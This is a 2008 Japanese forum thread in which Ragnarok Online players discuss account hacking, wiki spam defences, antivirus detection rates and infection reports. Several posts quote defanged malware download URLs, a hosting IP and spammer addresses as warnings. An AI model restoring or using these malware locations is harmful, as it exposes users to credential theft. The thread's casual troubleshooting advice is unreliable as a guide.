ないよね、Wikiがまとめサイトをわざわざ参照しにいくなんて <> （○口○*）さん<>sage<>08/06/24 14:57 ID:SyesSzWw0<> 特定のIP弾いた方が楽だと思うけど
どちらにせよ虱潰しに変わりない <> （○口○*）さん<>sage<>08/06/24 15:02 ID:ATcdIjKL0<> .krや.hkや.cnは弾けるが、日本のプロバイダからやられると防ぎようがないからな
ブログは承認制、閲覧者も対策なしで踏んだら自業自得ぐらいは最低でも必要 <> （○口○*）さん<>sage<>08/06/24 15:03 ID:iTsTY6Hy0<> 風-ノ＝虱

漢字いっこ覚えた <> （○口○*）さん<>sage<>08/06/24 15:22 ID:LIT4B+FF0<> >>87
spam.ini.php
pukiwiki公式見に行こうな

たいていのRO系wikiには導入済み <> （○口○*）さん<>sage<>08/06/24 16:38 ID:7tpMAFLp0<> 「Adobe Reader」「Adobe Acrobat」v7/8に深刻な脆弱性、アップデート版が公開
ttp://www.forest.impress.co.jp/article/2008/06/24/adobe_vulnerability.html
現時点で「Adobe Reader」自動更新の対象外、パッチなどのダウンロードが必要 <> （○口○*）さん<>sage<>08/06/24 17:00 ID:iTsTY6Hy0<> 大したことではないが、ダウンロードページに日本語版まだないのね。 <> （○口○*）さん<>sage<>08/06/24 17:13 ID:zexw3HzP0<> 職Wikiとかの管理・運営ページ見たら、どういうプラグインが
入ってるか分かるぞ。
spam.ini.phpだけじゃなく、禁止ワードのブロックやら入ってるし
cn・kr含めたアクセス規制してる所も多い。

しかし国内の中継者（？）としてはodnが有名だが、そっちに
なると、対応は難しいよなぁ。
国別ブロックみたいな事前防御が出来ないから、どうしても
後手に回るし。 <> （○口○*）さん<>sage<>08/06/24 17:35 ID:JbvfdInt0<> 禁止単語を弾くBlacklist方式だと、どうしてもすり抜けが出てきてしまうよ。
この間の269g踏み台ブログの時も、Ymlpha氏直轄の弓手Wikiですら改竄を受けたし。
利便性よりも安全性を重視するために、徐々にWhitelist方式に移行する準備が行われている様だけど。

今後、情報サイトは以前のように増加する事は考えにくいとはいえ、なんともやるせなさを感じる。 <> （○口○*）さん<>sage<>08/06/24 17:40 ID:RhUIoTUg0<> 【　　アドレス　】ttp://www.nicovideo.jp/search/Ro
ttp://www.nicovideo.jp/watch/sm3750703

【気付いた日時】 6/24AM17:25
【　　　 OS　　】 XP
【使用ブラウザ】 IE（Ver7.0.5730.13）
【WindowsUpdateの有無】随時更新
【　アンチウイルスソフト】 AVG Anti-Virus Free
【その他のSecurty対策】
【ウイルススキャン結果】これから
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無

ニコニコ動画のＲＯリンクに、変な動画があってそれをクリックしてしまいました。
内容はただのニュースで、ＡＶＧやウィルスソフトの反応はなかったのですが
動画のタイトルを見ると
「飛騨牛客か・一番よく分かってるそうて・す」と・・いかにも中華な感じで
心配です。
最近はフラッシュでも感染すると聞きましたが、・・こういう場合どうしたら良いでしょうか？

↑間違えてアカハック総合対策スレに書き込んでしまったので、転載させて下さい。
二重ですみません。 <> （○口○*）さん<>sage<>08/06/24 17:48 ID:Lw5lE7850<> >>96
URL張るのはいいがh抜きだけだと見れるやつ多数いるんだ。
みんな■とかで途中を潰してるだろ？

ウイルス対策としては
気になるならフォーマットしてOSからインスコ <> （○口○*）さん<>sage<>08/06/24 17:56 ID:ehmu6PbN0<> >>96
>>1 <> （○口○*）さん<>sage<>08/06/24 18:04 ID:leOG7PdW0<> >>96
>SO YA RO !!
ここのROに反応して検索ヒットしただけじゃね <> （○口○*）さん<>sage<>08/06/24 18:31 ID:RhUIoTUg0<> >>97さん >>98さん
■忘れてました、重ね重ねすみません。
慌てすぎですね自分（；´Д｀）
ご指摘＋解決策提示ありがとうございます。

>>99さん
盲点でした！！そこに反応してリンクされてたんですね。
タイトルが変なのは、濁点が文字化けしていただけでしょうか。

ＡＶＧでウィルススキャン中ですが、今の所ウィルスの検知はありません。
終わったら、念のためにカスペルスキーも試してきます。
ウィルスが見つかったら、また報告させて下さい。
お世話になりました。 <> （○口○*）さん<>sage<>08/06/24 18:37 ID:ar55paxF0<> そもそもニコ動の動画投稿者ができるのはFlashで再生できる動画ファイルを
アップロードすることであって、Flashそのものを投稿するワケではないと思うんだ。 <> （○口○*）さん<>sage<>08/06/24 18:59 ID:ildQKPme0<> >>91
それ導入してるのにちょっと前にWikiの荒らしが話題になったのはなんでだ？
と思ったが、話題になったから導入したのかな
と聞くのも怒られそうだからそういうことにしとく、滅多なこと言うものじゃないな <> （○口○*）さん<>sage<>08/06/24 19:45 ID:8f15sw/b0<> 中国・香港などからの書き込みを塞いでたら国内のODN経由でやってきた
ＮＧに入っていない新しいドメインを作ってきた

と言う事。これじゃ防ぎようが無い。
これ以上だと凍結するか外部リンク自体をNGにするしかない。
Wikiは外部リンク一切無しとかに出来ればいいんだけどね。
専ブラ入れずにWikiのTOPからスレを見に来る人はいまでも多いっぽいのが難点。 <> （○口○*）さん<>sage<>08/06/24 20:26 ID:NuIhrB280<> >>84
それは結構昔からあるよ
不正チケットの気がするけどな <> （○口○*）さん<>sage<>08/06/24 20:53 ID:NrGBWzMA0<> >102
spam.ini.phpは設定した語句（ドメイン等）をブロックする機能。
デフォルトでかなりの数のドメインが登録されてて、それだけでも結構防ぐが
自動で追加される訳じゃないので、管理人がメンテ（追記）しないと新種の
罠アドには対応できない。

またアクセス制限で中韓台をブロックしてても、国内を中継されると防げない。
アクセス制限を強化しすぎると一般の利用者に不便が出る。

弓手Wikiが攻撃食らったのは、国内経由で・新種のアドで・一番最初に
攻撃食らったから。
これを防げというのは、エスパーじゃないんだから酷ってもんだろう。
（２回目のは一部設定ミスもあったようだけど）

他のWikiが改竄食らってないのは、管理人が対応できたか、最初から
攻撃対象じゃなかったかのどちらかと思う。 <> （○口○*）さん<>sage<>08/06/24 21:00 ID:NrGBWzMA0<> ホワイトリストも、個人的には微妙というか、ベストの案とは思えない。
xrea事件のような事は、ホワイトリスト・ブラックリストという区分外での騒ぎだし。

それにクラックの可能性はどこのサイトでも常にあるし、ホワイトリスト使ってるから
安全、とか変な油断・認識が生じそうで怖い。 <> （○口○*）さん<>sage<>08/06/24 21:03 ID:VsuqzpAT0<> >>106
セキュリティに完璧はない。どれだけリスクを減らせるかの問題。 <> （○口○*）さん<>sage<>08/06/24 21:26 ID:fq7zc/SI0<> どれだけリスクを減らす事が出来るか、というよりは
どれだけ自分の責任をWiki管理人に押し付けれるか

って気がするけどな、その手の意見って

安全策を要望するのは利用者の１意見として当然あるが
Wiki管理人に負担強いてるだけにしか見えん

セキュリティの基本は自衛だしな <> （○口○*）さん<>sage<>08/06/24 21:53 ID:fZtC2Hh80<> ま、どのように対応するかはWiki管理人諸氏が決めるだろ。
ここで外野が喚く事じゃないって。

管理放棄して未対策のまま放置し続けてるとかなら兎も角
ちゃんと対応してくれてるんだし。
ブラックリストだろうがホワイトリストだろうが、管理人諸氏が
無理しない範囲で対応してくれれば十分。

それ以上は望まんよ。 <> （○口○*）さん<>sage<>08/06/24 22:05 ID:fZtC2Hh80<> そしてアプリコの殴りプリスレに貼られていたもの

www■makgcat■com/woodem■htm　(VT　13/33)
--->www■makgcat■com/rm■exe　(VT　25/33　Trojan-PSW.Win32.Mapler.ae)

woodem　http://www.virustotal.com/analisis/e5f04e39206d92ab82aa524926b226f5
rm　http://www.virustotal.com/analisis/7a221c374aa1ba5da373133fad553e5f

rm■exeはMcAfee・Microsoft・NOD32・Symantecがスルーしてるので注意 <> （○口○*）さん<>sage<>08/06/24 23:50 ID:LIT4B+FF0<> >>105
ふと攻撃食らわなかったWikiを考えたのだが
全部が攻撃対象になったのではないかと思う。

閲覧専用と編集専用と別けたWikiが幾つかあるが
其れを施してたWikiは攻撃されてない
（但し攻撃試行があったという報告はある）

アルケミWikiは攻撃されたが同じ管理人のSageWikiには攻撃がなかったとか。
似たようなことを行ってるクエスト案内所も被害報告なし
貧スレWiki（多分CommonWikiも？）には攻撃試行があったという報告がある

ちなみに
未実装Wikiは元からホワイトリスト方式だった。

俺がわかる範囲で書いてるので判らなかったWikiについては明言を避けるが

しかし編集とかでWiki管理人が色々困ったり
XREAの騒動でサーバー移動の話まで出てきてる模様。
Wiki管理人さん無理をしないようにしてください。 <> （○口○*）さん<>sage<>08/06/25 00:03 ID:1yhfqjyx0<> HPに設置したBBSへのアダルト系投稿が続くので、ISPに片っ端から対応依頼を
出してみました。この件であるISPから来た返答から抜粋。
国内のISP（串じゃなさそうなとこ）ばかりから来てたので、これなのかもなー。
意図せぬ投稿ってのもやっかいだねぇ。

一応、手口的なものとして、周知しといた方がいいかなと思ったので投稿しときます。

>●意図的な投稿かどうか、掲示板のセキュリティについて確認させてください
>
>掲示板への迷惑な投稿についてご連絡いただいておりますが、昨今のアダルト
>サイトへ誘引する投稿は、「クロスサイトリクエストフォージェリ」（別項参
>照）という手法で行われているとの報告がございます。
>
>誠に恐れ入りますが、お客様の掲示板では「掲示板以外からの投稿を受け付け
>ない設定」になっているか、ご確認いただけますでしょうか。
>
>●「クロスサイトリクエストフォージェリ」について
>
>「クロスサイトリクエストフォージェリ」とは、悪意のあるホームページにス
>クリプト等が設置されており、無関係な第三者がそのページを閲覧しただけで、
>別の掲示板等へ投稿が行われてしまうものです。
>
>IPアドレスが記録されている投稿者は、（悪意のある）別のホームページを閲
>覧していただけですので、投稿した覚えがなく、また、ウイルス感染による投
>稿ではないために、ウイルス対策ソフト等による対策も難しい状況です。
>
>「クロスサイトリクエストフォージェリ」への対策といたしましては、掲示板
>側で、「掲示板以外からの投稿を受け付けない設定」に変更することで防ぐこ
>とが可能です。 <> （○口○*）さん<>sage<>08/06/25 00:35 ID:ZmNVWjXr0<> 要するに「飛ばし」じゃねーか？ってことね
リファチェックしろと言いたいのか <> （○口○*）さん<>sage<>08/06/26 16:01 ID:PWK493Iu0<> 鯖板に貼られていたもの

>977 Saraの中の名無しさん 08/06/26 11:54:49 ID:o6O72ECk
>【RO】　限界チャレンジャー！
>
>【ニコニコ動画】【RO】　限界チャレンジャー！～殴りプリvsカーサ・TIME
>
>ATTACK～殴りプリさんがトールでカーサでタイマンをはる動画98で挑んでLVあ
>
>がったということは発光したんですよね？おめでとうございます！
>ttp://www■makgcat■com/woodem■htm

ダウンローダは、カスペすりぬけ。
本体はカスペ検出名「Trojan-PSW.Win32.Mapler.ae」

VirusTotal 13/33
ttp://www.virustotal.com/analisis/e5f04e39206d92ab82aa524926b226f5

VirusTotal 25/33
ttp://www.virustotal.com/analisis/7a221c374aa1ba5da373133fad553e5f

本体
ttp://www■makgcat■com/rm■exe <> （○口○*）さん<>sage<>08/06/26 20:56 ID:/Ek3fbOd0<> 改変に見覚えあったからコピペ
キャラ＆ギルド名は一応念のため伏字

458 名前：▲▲▲▲[] 投稿日：2008/06/24(火) 16:36:30 ID:.jgfduG6
こんにちは(*'ω')ﾉ
現在ガルムサーバーで活動している「●●●●」というギルドをやっています！
現在Ｇｖを中心として活動をしています！！
Ｇｖなんてやったこと無い。Ｇｖで失敗すると怒られる。
Ｇｖに対して色々分からない人もいると思いますが、●●●●ではＧｖ中でも仲良く楽しく、怒る事無く初心者でもやりやすい環境を作るように活動しています(*'ω')
もしこれからＧｖちょっとやってみようかな。
Ｇｖ試しに出てみようかな？などありましたら是非一度●●●●に着てみてくださいヾ(*'ω')ﾉ
ギルドでの狩りもありますので色んな面で楽しめると思いますのでこの記事を見て興味が出た方は
「▲▲▲▲」にwis頂くか乗せている●●●●HPに書いてあるたまり場で声を掛けて下さいな！
それでは長文失礼しました！
ttp://www■makgcat■com/woodem■htm <> （○口○*）さん<>sage<>08/06/26 21:19 ID:mtcW6ip+0<> makgcat■comのipは 125■65■112■49

そしてこのIPが持ってるドメインは makgcat 以外に
jplineage■com
undenow■com <> （○口○*）さん<>sage<>08/06/27 00:55 ID:B8uB9nv90<> XREAの広告、またやられたというか巻き戻っちゃってるので注意。
XREAの該当ファイルのタイムスタンプは日本時間26日3:21。
fccjaのトロイのタイムスタンプは18日だけど
こっちはたぶんいじってあるのであてにならない。 <> （○口○*）さん<>sage<>08/06/27 02:02 ID:B8uB9nv90<> XREAまた修正済みの17日のに戻った。書き換え合戦か? <> （○口○*）さん<><>08/06/27 02:30 ID:oBIVGsvn0<> http://gdata.co.jp/press/archives/2008/06/8g_data.htm
●6月の検出率順位　製品名　検出率
1位　G DATA アンチウイルス2008　　　　　　　　99.21%
2位　Kaspersky アンチウイルス7.0　　　　　　　　98.96%
3位　Norton アンチウイルス2008　　　　　　　　　98.89%
4位　Windows ライブワンケア　　　　　　　　　　　98.53%
5位　F-Secure インターネットセキュリティ 2008 98.09%
6位　McAfee ウイルススキャンプラス　　　　　　　95.77%
7位　ウイルスバスター2008 　　　　　　　　　　　　92.42%
8位　ウイルスセキュリティ ZERO　　　　　　　　　 90.50%
9位　NOD32アンチウイルス V2.7 　　　　　　　　　88.85%
10位　ウイルスキラーゼロ　　　　　　　　　　　　　　85.32%

（ドイツAV-Test調べによる、2008年6月11日現在） <> （○口○*）さん<>sage<>08/06/27 03:23 ID:LfYA0dc10<> 一連の騒動で、閲覧する側もURLにxreaが含まれているだけで拒否感を示すようになってきた感じだね。
無料鯖も今後の雲行きが怪しくなってきたし、困ったものだ。 <> （○口○*）さん<>sage<>08/06/27 04:02 ID:EiqDRk+W0<> >>120

やっぱwikiが集中してあるサーバーってのも有るんだろうな。
今は亡きROWikiとかもここだったしな

なんか管理側とクラッカー側の書き換え合戦状態と言う情報も <> （○口○*）さん<>age<>08/06/27 06:57 ID:bs8bryTx0<> アカウントハック対策で別ＰＣを導入してるんだけど、メインＰＣと別ＰＣを同時起動してたら危険度って一緒？
どっちもウィルス対策ソフトは入れてるけど、ルーターとか通して移ってったりするんかしら。 <> （○口○*）さん<>sage<>08/06/27 07:55 ID:JWfJToHA0<> 共有とかしてなけりゃ基本的には大丈夫じゃね <> （○口○*）さん<>sage<>08/06/27 10:13 ID:eZ91Cevg0<> >>119
ウイルスバスター涙目だな
ウイルスセキュリティと2パーくらいしか検出率の差がない

その数パーの差がでかいって話だけどね <> （○口○*）さん<>sage<>08/06/27 10:14 ID:OVAmthgc0<> 自分が穴を踏むかどうかの違いだから
宝くじ買うようなもんだ <> （○口○*）さん<>sage<>08/06/27 10:41 ID:lHY5MwJ10<> >>119
むしろNOD32が悲惨だなこりゃ <> （○口○*）さん<>sage<>08/06/27 11:07 ID:GoXQgc8d0<> NOD32が悲惨なのはともかく、ノートンが高いのが腑に落ちない。
正直スマンテックなノートンがそんなに高いとは思えないので、検体の偏りかなぁ。 <> （○口○*）さん<>sage<>08/06/27 11:14 ID:OVAmthgc0<> たぶん>>127の思いこみ。
その時々で検知率なんて変わってしまうしねぇ。 <> （○口○*）さん<>sage<>08/06/27 11:17 ID:g5AGGW5m0<> NOD最強伝説
http://www.av-comparatives.org/seiten/ergebnisse_2008_05.php <> （○口○*）さん<>sage<>08/06/27 11:18 ID:rACCxfVQ0<> Windowsライブワンケアが高いのも納得できないなぁ。
国によってウィルスの傾向が違ったりするのかもね。 <> （○口○*）さん<>sage<>08/06/27 14:58 ID:nZfhGFJv0<> NOD32･･･、働いてるネカフェで導入したトコなのに何やってんだ･･･。もっと頑張れよ。
まあ、このテのテストは主催する団体で結構結果違ってくるが。 <> （○口○*）さん<>sage<>08/06/27 15:05 ID:B8uB9nv90<> 何がいいかとかは荒れるのでやめよう。 <> （○口○*）さん<>sage<>08/06/27 15:09 ID:B8uB9nv90<> XREAの件、202.181.97.153をDNSから外したみたい。
nslookup j1.ax.xrea.com
最初(10日頃?)からやっとけよ! <> （○口○*）さん<>sage<>08/06/27 15:20 ID:U/2O+Er50<> 検出率も重要だけど
対応速度はもっと重要だと思っていたりする
つまりあれだノートンおせぇ……ただそれだけ…… <> （○口○*）さん<>sage<>08/06/27 15:28 ID:7u4qPjc20<> Avastなんて載ってすらいないな
そろそろカスペさんに乗り換えるべきか… <> （○口○*）さん<>sage<>08/06/27 16:07 ID:Xob90SgH0<> なにゆえにゅ缶のほうのスレはなくなってしまったのでしょうか。
雑談を含む話はLiveROで、という感じの住み分けが便利だったのですが。 <> （○口○*）さん<>sage<>08/06/27 16:12 ID:EiqDRk+W0<> >>136
あっちもこっちも同じような内容になってきたから
と覚えてるけど <> （○口○*）さん<>sage<>08/06/27 16:20 ID:5b3oFqmB0<> RO板の方の役割は危険アドレスの収集のみということになっていたが、
それだけならこっちのスレでも扱えること、LiveROでも落ちる心配の無い状況であること
一番大きかったのは粘着質な誘導が住み着き、
時には趣旨に反してない話題に対しても誘導を張ったりという問題もあったことだと思う <> （○口○*）さん<>sage<>08/06/27 16:44 ID:OVAmthgc0<> IE 6にパッチ未提供の脆弱性、実証コードすでに公開済み
http://internet.watch.impress.co.jp/cda/news/2008/06/27/20079.html <> （○口○*）さん<><>08/06/27 16:53 ID:VRQxBmur0<> 昨日当たりから　PGが
140.114.79.233　台湾ＩＰを頻繁にはじくんだけどなんでだろ
場合によってはＰＧが落ちる

怖いから　再インストールしてくる <> （○口○*）さん<>sage<>08/06/27 16:56 ID:OVAmthgc0<> >>140
てかルーター入れてないの？ <> （○口○*）さん<>sage<>08/06/27 17:19 ID:B8uB9nv90<> IE 6とIE 7に危険度「中」の脆弱性
IE 6と7で、それぞれ別の脆弱性が報告された。
ttp://www.itmedia.co.jp/enterprise/articles/0806/27/news054.html <> （○口○*）さん<>sage<>08/06/27 17:35 ID:Bfq0ByOn0<> ぜ、脆弱性･･･ <> （○口○*）さん<>sage<>08/06/27 17:42 ID:5b3oFqmB0<> >>78,143
何が言いたいのかわからん <> （○口○*）さん<>sage<>08/06/27 17:44 ID:7u4qPjc20<> 多分「か…漢だ」ネタみたいなもんだと思う。
でも読み合ってるから何か勘違いしてるんじゃね？ <> （○口○*）さん<>sage<>08/06/27 17:47 ID:IKi+CWOmO<> 俺も>>145だと思う
だとすると「>>78=>>143は馬鹿です」というアピールにしかなってないが <> （○口○*）さん<>sage<>08/06/27 19:14 ID:/4Xbp8Hn0<> 「けど、脆って字、脆弱性って熟語で出てこないと何て読むか分からないよな」
と思った俺は確実にアホ <> （○口○*）さん<>sage<>08/06/27 19:17 ID:IKi+CWOmO<> もろい <> （○口○*）さん<>sage<>08/06/27 19:17 ID:YDcJborP0<> も、脆弱性…

だったらよかったかも。 <> （○口○*）さん<>sage<>08/06/27 20:00 ID:GoXQgc8d0<> ここは下らない（寒くもない）冗談披露スレじゃねーぞ。 <> （○口○*）さん<>sage<>08/06/27 20:06 ID:ct8lhwz00<> >140
そのIPでググれば、なんかポロポロ出てくる。
串なのかね？

で外から来てる場合、ただのアタックの可能性もあるが
何かしらのバックドアが仕込まれてる可能性もある。

OSの再インストールもいいけど、先にPCチェックして
何か潜んでないかの確認した方がいいかも。 <> （○口○*）さん<>sage<>08/06/28 23:46 ID:PeY3Lvc70<> ちょっとは考えるようになったのかと思えば、やっぱり中華は中華だった

殴りアコプリスレより捕獲
---------------------------
681 名前：ヒール回復774さん MAIL: 投稿日：2008/06/28(土) 18:20:26 [ yueG1tIk ]
突然メ-ルを送り失礼しました。
ご縁がありましたら、ぜひ私の会社（商店）との取引を、お願いします。

サイト: ttp://www■makgcat■com/woodem■htm
メール注文: ourbrand@21cn■com ourbrand@tom■com
---------------------------

BBSでなんの取引をする気だ……
つーか、まさかこんな文面のSPAM送りまくりとかしてるのか？

>110や>114にあるが、一応調査結果
www■makgcat■com/woodem■htm
--->www■makgcat■com/rm■exe
woodemは5/25付け、rmは6/18付けで中身変わってないけど
現時点でrmはノートンとNOD32が未だにスルーなのでご注意を <> （○口○*）さん<>sage<>08/06/29 08:45 ID:bbSexK7s0<> 【　　　気付いた日時　　　　　】 6月29日の7：30くらい
【不審なアドレスのクリックの有無　】なし
【他人にID/Passを教えた事の有無】なし
【他人が貴方のPCを使う可能性の有無】なし
【　　ツールの使用の有無　　　】なし
【　ネットカフェの利用の有無　　　】なし
【　　　 OS　　】 WindowsXP SP2
【使用ブラウザ】 IE7（7.0.5730.13）
【WindowsUpdateの有無】有
【　アンチウイルスソフト】ウィルスバスター2008
【その他のSecurty対策】ルーター(WebCasterV120)
【ウイルススキャン結果】ウィルスバスター2008は問題なし
　　　　　　　　　　　　　カスペルスキーオンラインスキャンは現在実行中
【スレログやテンプレを読んだか】現在のスレログとテンプレは読ませてもらいました。過去ログはこれからです。
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】
先ほどガンホーIDにログインをしたら、覚えのないROのアトラクションIDが1つ追加されていて
メールを確認したところ、6/27日9：30くらいに作成されていました。課金の状態は「未払い」になっています。
マシン自体はほとんどRO専用で、課金のためガンホーのサイトにアクセスするくらいです。
やはりハックされてると見て間違いないでしょうか？ご教授いただけると助かります。 <> （○口○*）さん<>sage<>08/06/29 09:04 ID:GwNP8lEa0<> 見た事の無いアトラクションIDならハックだろうな。癌のDB異常の可能性もあるが。

早急に安全な環境からパスワードを変更して報告する作業に移るんだ。 <> （○口○*）さん<>sage<>08/06/29 17:48 ID:IwEt8Hgr0<> ＲＯ内で無差別で友達登録飛ばしてくるノビが居たんだけど
これて垢ハック関係なの？
なんかそんな事を南で言ってる人居たんだけど <> （○口○*）さん<>sage<>08/06/29 17:57 ID:uxxxlhDd0<> ×「そうです」
×「違います」
△「かもしれないね」
○「知るか（ｒｙ」 <> （○口○*）さん<>sage<>08/06/29 18:49 ID:TYxs0DKy0<> ただのBOTの暴走、に一票

Wisだのなんだのでは、癌IDやROIDには繋がらない
ましてやパスワードにも繋がらない

例えばRMTerがログの偽装をやってるのかもしれない
その関係から誤BAN、更にそれを利用したRMTerの
BAN解除とかも考えられる

変な事態になりかねんので、無視するのが一番 <> （○口○*）さん<>sage<>08/06/29 18:59 ID:bbSexK7s0<> >>154
レスありがとうございます。

カスペルスキーオンラインの方もとくにウィルスの検出などはありませんでした。
別ネットワークの安全なPCから変更＆ガンホーに報告をしたいと思います。 <> （○口○*）さん<>sage<>08/06/29 22:35 ID:GwNP8lEa0<> 物質スレで質問あったので気付いたが、まとめサイトにもWikiにもなくなってる情報。
まとめサイトのPG2の近辺に記載しておいて欲しいところ。

■PG2用 RO許可リスト■
RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22 <> （○口○*）さん<>sage<>08/06/30 02:40 ID:Yd/ZyJ+E0<> (`o´)未転生が転生に色々言うスレm(_ _)mに韓国ＲＯのファンサイトへのリンクが張ってあるんだが（430付近）、あれが安全なリンクかわかる人いる？
スレの主旨と違ってるカキコと外国サイトへのＵＲＬがいきなり貼り付けてあって、踏んでる人も居るみたいだったのでちょっと気になった。
相談先が違うなら、有効な相談先を教えて欲しい。 <> （○口○*）さん<>sage<>08/06/30 04:03 ID:hfmtazcr0<> >>1 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/06/30 05:14 ID:Ewz/BEPq0<> >>159
こんな感じにしてみました。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#PG2RO <> （○口○*）さん<>sage<>08/06/30 08:05 ID:/8NOrk5Z0<> >>161
かっこいいと思って書いてるんだろうけど、それならスルーしたほうがまし
テンプレカキコにテンプレレス <> （○口○*）さん<>sage<>08/06/30 10:08 ID:v3IuF+td0<> >>163
>>163 <> （○口○*）さん<>sage<>08/06/30 11:39 ID:Y8+5MhXh0<> Kingsoftの新しいウイルス見つけたらQUIカードあげるよってのが本日で終わりらしい。
QUOカード集めの為に導入していた人(アカウントハック関連は更新が頻繁なので
新種を狩るのは結構楽だった)は止めるだろうから選択枝として更にありえなくなっちゃったね。 <> （○口○*）さん<>sage<>08/06/30 13:39 ID:1ubNKTGx0<> 見返りが欲しくて検体送ってたわけじゃないし、
直接duba.netに送ってたから何ももらったことはないな。

選択肢
○せんたくし
×せんたくえだ <> （○口○*）さん<>sage<>08/06/30 16:58 ID:FpeTVE520<> >>152
それ、原文は中華偽ブランド業者の記事な。

これを検索するとでてくる
”ご縁がありましたら、ぜひ私の会社（商店）との取引を、お願いします。”

こうして福建人は自分で一文字も書くことなく罠テンプレ記事を増やして行くのだった。
福建人を数年見てきてるけど、やつら自身の記事ってのを一度も見たことがないぜ。 <> （○口○*）さん<>sage<>08/06/30 19:08 ID:uel1xBeU0<> らぐみみがいつの間にか育毛剤の宣伝ページになっていたんだけど
これはアカハクじゃないよな？ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/06/30 19:19 ID:dutGdMIy0<> >>168
らぐみみさんは6/15前後に閉鎖された模様。
閉鎖するという事で過去絵とかUP一挙公開されていたのを確認しています。
ラグナロク☆ねっとわーくのログ、08/6/18分にリンク解除の記述がありました。 <> （○口○*）さん<><>08/07/01 19:38 ID:Q7nvJOfp0<> 警告age

ttp://www.gamecity.ne.jp/dol/news/body.htm#921
>この度、弊社サービス「大航海時代 Online ＠Web」のログイン画面を装うサイトが存在することを確認いたしました。

支那貿易商がゲーム内で稼げなくなったからか、やはりこちらにシフトし始めたか。 <> （○口○*）さん<>sage<>08/07/01 19:41 ID:lrVqxTVf0<> 警告も何も、普通のフィッシング詐欺ですやんか。それ。 <> （○口○*）さん<>sage<>08/07/01 19:58 ID:oJZuFhrr0<> そうですね。 <> （○口○*）さん<>sage<>08/07/01 23:58 ID:GMfV+C9v0<> そういえばＲＯのタイポを狙ったサイトあったよな？
ああいうのでフィッシングをされたら一瞬わからなくなるわな <> （○口○*）さん<>sage<>08/07/02 02:36 ID:KCT0z1lQ0<> kasperskyのスキャンで
感染オブジェクト名：C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe
ウイルス名：感染: Email-Worm.Win32.Brontok.cv
とでたのだけれども駆除の方法がよく分からないんだ
こういうの強い人がいたら助言が欲しい <> （○口○*）さん<>sage<>08/07/02 02:59 ID:uOMu2m8s0<> >>174 誤検出の可能性高し

●● RMT業者の垢ハックが多発している件23 ●●
http://live27.2ch.net/test/read.cgi/ogame/1214625452/579-595 <> （○口○*）さん<>sage<>08/07/02 10:34 ID:36iTApA70<> >174
そのファイルを
http://www.virustotal.com/jp/
にぶち込むんだ <> （○口○*）さん<>sage<>08/07/02 14:30 ID:d8S50r0G0<> AdobeReader9.0リリース
8系のパッチが当たってるんだか当たってないんだかわからくて不安な人はどうぞ。 <> （○口○*）さん<>sage<>08/07/02 20:38 ID:KCT0z1lQ0<> ぶちこんでみた・・・けどこれはどういうことなのか <> （○口○*）さん<>sage<>08/07/02 21:19 ID:HuAOv9vu0<> どうって・・・ <> （○口○*）さん<>sage<>08/07/02 21:52 ID:a2rEroeT0<> 起動が早くなったらしい（伝聞 <> （○口○*）さん<>sage<>08/07/03 15:31 ID:JmZxdrbS0<> 米PlayStationサイト改ざん、偽ウイルス対策ソフト売りつける
ttp://internet.watch.impress.co.jp/cda/news/2008/07/03/20139.html <> （○口○*）さん<>sage<>08/07/03 15:41 ID:eLkvLO7b0<> 「自宅の無線LANセキュリティ設定の確認を」、IPAが6月の呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/07/02/20126.html

>「WEP」方式については暗号の解読が容易であるため、
>現状では使用を推奨しないとしている。 <> （○口○*）さん<>sage<>08/07/03 15:47 ID:0Httx7610<> DSのwi-fiは諦めるか… <> （○口○*）さん<>sage<>08/07/03 15:54 ID:eLkvLO7b0<> >>183
ルーターのクライアントモニタを定期チェックして不正接続がないか確認。
それに加えて時々キー変更しておけば良いと思うよ。
MAC制御は一見よりセキュアに見えて、そうでもなかったりするので。 <> （○口○*）さん<>sage<>08/07/03 17:27 ID:JmZxdrbS0<> Opera9.51リリース <> （○口○*）さん<>sage<>08/07/03 18:25 ID:4zpS4+2I0<> >>183
syslog吐ける無線アクセスポイントを導入するか、USBアダプタでPCを経由させた方がいいかも。
それに加えて、DSからのパケットはUDPだけ通すようにして、TCPは全遮断。
WiiやPSPなら、AESが使用可能なので、いっそアクセスポイント自体を別建てにするのも良いかもしれない。 <> （○口○*）さん<>sage<>08/07/03 23:33 ID:udyScBQR0<> AOSSだったら大丈夫？ <> （○口○*）さん<>sage<>08/07/03 23:46 ID:E1TbjcPo0<> AOSSは一番下の暗号規格に合わせてしまうので、
NDSみたいにWEPしか対応していない機器を繋いじゃうと意味なす <> （○口○*）さん<><>08/07/04 02:54 ID:OrAw1m2L0<> 質問です。
さきほど、X-Cleanerオンラインスキャナでスキャンを行った所「MarketScore」
というものが検出されました。ググると何か情報を盗む系？のウィルスぽい事が。
そのまま除去して再起動したのですが、これでもう情報は盗まれないのでしょうか？
必要なら再インストールもしたほうがいいのでしょうか？
ご教示おねがいします。　ちょっと焦っているのでageます。 <> （○口○*）さん<>sage<>08/07/04 03:38 ID:6Vq5LqLG0<> >>182
これ、無線回線がPSPとかのゲーム専用だったら特に問題なしと考えて差し支えないだろうか。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/04 03:43 ID:yJ6F0iBK0<> 気になったので"MarketScore"でぐぐって
最初のページでヒットした所を覗いたら何かのソフトに添付されている場合もあるとか。
それらのソフトを使用していない場合は誤検出の可能性もあるそうです。
http://oshiete1.goo.ne.jp/qa2235160.html
ウイルスではなくスパイウェアのようです。

最近なにかのソフトをインストールしていない、それら関連のソフトで心当たりがない場合は
いつどこのサイトで踏んだか判らないのでなんともいえません。

